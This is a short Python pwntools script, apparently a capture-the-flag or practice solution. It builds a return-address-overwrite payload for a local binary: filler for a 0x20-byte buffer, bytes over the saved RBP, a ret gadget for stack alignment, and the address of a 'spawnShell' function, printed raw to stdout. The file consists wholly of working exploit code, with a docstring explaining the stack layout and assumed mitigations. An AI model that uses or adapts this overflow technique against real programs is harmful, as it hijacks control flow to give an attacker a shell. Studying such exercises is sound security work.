"""Build a return-address-overwrite payload for ``./bin`` and emit it on stdout.

The bytes written, in stack order:

* ``0x20`` bytes of filler for the password buffer,
* 8 bytes covering the saved RBP (its value does not matter),
* the address of a bare ``ret`` gadget — a ``ret`` pops 8 bytes off the
  stack, so this only shifts RSP by 8 before control reaches the target
  (the original author notes this as a libc stack-alignment quirk),
* the address of ``spawnShell``, which replaces the real return address.

Both addresses come straight from the ELF symbol table and gadget search,
so the script presumably expects the binary to run at its link-time
addresses (no PIE relocation is applied) and without a stack protector
between the buffer and the saved return address — verify the build's
mitigations before assuming the layout above matches.
"""
import sys

from pwn import *

# Keep pwntools' own logging off stdout so only the raw payload is emitted.
context.log_level = 'CRITICAL'

target = ELF('./bin')
gadgets = ROP(target)

spawn_shell_addr = target.symbols['spawnShell']
ret_gadget_addr = gadgets.find_gadget(['ret']).address

# Frame pieces, lowest address first.
frame = [
    b'A' * 0x20,            # password buffer
    b'B' * 8,               # saved RBP
    p64(ret_gadget_addr),   # 8-byte RSP adjustment only
    p64(spawn_shell_addr),  # overwritten return address
]
payload = b''.join(frame)

# Binary output: bypass the text layer so no newline translation happens.
sys.stdout.buffer.write(payload)